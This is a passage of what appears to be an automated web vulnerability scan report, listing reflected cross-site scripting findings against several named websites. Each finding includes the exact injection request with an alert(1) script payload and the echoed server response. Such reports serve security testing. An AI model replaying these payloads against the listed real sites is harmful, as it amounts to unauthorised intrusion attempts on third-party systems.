X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63791


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/src/scripts29665"><script>alert(1)</script>4685965d83d/tools.js?nocache=2" type="hidden" />
...[SNIP]...
4.127. http://www.haber.gen.tr/src/scripts/tools.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /src/scripts/tools.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cfa3"><script>alert(1)</script>f6fd26bb8b4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /src/scripts/tools.js2cfa3"><script>alert(1)</script>f6fd26bb8b4?nocache=2 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:07 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63790


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/src/scripts/tools.js2cfa3"><script>alert(1)</script>f6fd26bb8b4?nocache=2" type="hidden" />
...[SNIP]...
4.128. http://www.haber.gen.tr/themes/project/style.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /themes/project/style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 761c1"><script>alert(1)</script>3e557343cc6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes761c1"><script>alert(1)</script>3e557343cc6/project/style.css?nocache=2 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:12:57 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63798


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/themes761c1"><script>alert(1)</script>3e557343cc6/project/style.css?nocache=2" type="hidden" />
...[SNIP]...
4.129. http://www.haber.gen.tr/themes/project/style.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /themes/project/style.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6df85"><script>alert(1)</script>7f18c5be575 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/project6df85"><script>alert(1)</script>7f18c5be575/style.css?nocache=2 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:13 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63798


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/themes/project6df85"><script>alert(1)</script>7f18c5be575/style.css?nocache=2" type="hidden" />
...[SNIP]...
4.130. http://www.haber.gen.tr/themes/project/style.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /themes/project/style.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3070f"><script>alert(1)</script>9d19976bc93 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/project/style.css3070f"><script>alert(1)</script>9d19976bc93?nocache=2 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:17 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63799


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/themes/project/style.css3070f"><script>alert(1)</script>9d19976bc93?nocache=2" type="hidden" />
...[SNIP]...
4.131. http://www.hadash-hot.co.il/submit.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hadash-hot.co.il
Path:   /submit.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69123"><script>alert(1)</script>fab6770260 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /submit.php?69123"><script>alert(1)</script>fab6770260=1 HTTP/1.1
Host: www.hadash-hot.co.il
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:15:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=2hrmotl33mdjrmgcj2rrd55mg4; path=/
Vary: Accept-Encoding
Content-Length: 21572
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="he" lang="he">
   
   <h
...[SNIP]...
<form action="/login.php?return=/login.php?return=/submit.php?69123"><script>alert(1)</script>fab6770260=1" method="post">
...[SNIP]...
4.132. http://www.hadash-hot.co.il/submit.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hadash-hot.co.il
Path:   /submit.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 145ae--><script>alert(1)</script>51dbf0ddac4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /submit.php?145ae--><script>alert(1)</script>51dbf0ddac4=1 HTTP/1.1
Host: www.hadash-hot.co.il
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:15:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=ns53ppdrjhtvontg84lgr82rl4; path=/
Vary: Accept-Encoding
Content-Length: 21511
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="he" lang="he">
   
   <h
...[SNIP]...
<a href="/login.php?return=/login.php?return=/submit.php?145ae--><script>alert(1)</script>51dbf0ddac4=1">
...[SNIP]...
4.133. http://www.hawaii.edu/cybersecurity/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hawaii.edu
Path:   /cybersecurity/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72768"><script>alert(1)</script>6cb577da8e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cybersecurity72768"><script>alert(1)</script>6cb577da8e/ HTTP/1.1
Host: www.hawaii.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:18:20 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d Resin/3.1.8 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 6367
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="c
...[SNIP]...
<input type="text" name="this" value="/cybersecurity72768"><script>alert(1)</script>6cb577da8e/" size="60">
...[SNIP]...
4.134. http://www.hawaii.edu/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hawaii.edu
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ed25"><script>alert(1)</script>b6c02b9894 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico5ed25"><script>alert(1)</script>b6c02b9894 HTTP/1.1
Host: www.hawaii.edu
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:32:19 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d Resin/3.1.8 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 6364
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="c
...[SNIP]...
<input type="text" name="this" value="/favicon.ico5ed25"><script>alert(1)</script>b6c02b9894" size="60">
...[SNIP]...
4.135. http://www.hoganlovells.com/AboutUs/Online_Client_Service/Overview/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /AboutUs/Online_Client_Service/Overview/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2a27"><script>alert(1)</script>4c036e60d13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /AboutUs/Online_Client_Service/Overview/?f2a27"><script>alert(1)</script>4c036e60d13=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:18:40 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1221; path=/
Set-Cookie: PortletId=1295002; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=eweajw55sht4c1afbrxbaf45; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 94183
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/aboutus/online_client_service/overview/?f2a27"><script>alert(1)</script>4c036e60d13=1&print=true'); ">
...[SNIP]...
4.136. http://www.hoganlovells.com/aboutus/history/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /aboutus/history/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bebc"><script>alert(1)</script>e3fcc433cbe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /aboutus/history/?7bebc"><script>alert(1)</script>e3fcc433cbe=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:18:36 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A66
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1071; path=/
Set-Cookie: PortletId=9201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=uz23b055gmgirib1s10jpge4; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 97428
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65c45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/aboutus/history/?7bebc"><script>alert(1)</script>e3fcc433cbe=1&print=true'); ">
...[SNIP]...
4.137. http://www.hoganlovells.com/aboutus/overview/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /aboutus/overview/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b55b2"><script>alert(1)</script>1f8b9cb08b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /aboutus/overview/?b55b2"><script>alert(1)</script>1f8b9cb08b8=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:18:39 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1068; path=/
Set-Cookie: PortletId=6201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=4ljypr45ttlk0ufexlwxwq55; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 94280
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/aboutus/overview/?b55b2"><script>alert(1)</script>1f8b9cb08b8=1&print=true'); ">
...[SNIP]...
4.138. http://www.hoganlovells.com/newsmedia/awardsrankings [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /newsmedia/awardsrankings

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 404ee"><script>alert(1)</script>3132bf1a85b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /newsmedia/awardsrankings?404ee"><script>alert(1)</script>3132bf1a85b=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:19:43 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1187; path=/
Set-Cookie: PortletId=1198201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=1srtawrostncgq24dtz2r1b4; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 249076
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/newsmedia/awardsrankings/?404ee"><script>alert(1)</script>3132bf1a85b=1&print=true'); ">
...[SNIP]...
4.139. http://www.hoganlovells.com/newsmedia/awardsrankings/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /newsmedia/awardsrankings/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9966e"><script>alert(1)</script>9e3a488b625 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmedia/awardsrankings/?9966e"><script>alert(1)</script>9e3a488b625=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:19:53 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A66
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1187; path=/
Set-Cookie: PortletId=1198201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=tgdjch55xqhztw2ucnfzrw45; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 249076
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65c45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/newsmedia/awardsrankings/?9966e"><script>alert(1)</script>9e3a488b625=1&print=true'); ">
...[SNIP]...
4.140. http://www.hoganlovells.com/newsmedia/fastfacts/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /newsmedia/fastfacts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 984c4"><script>alert(1)</script>9caa5b51498 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmedia/fastfacts/?984c4"><script>alert(1)</script>9caa5b51498=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:18:58 GMT
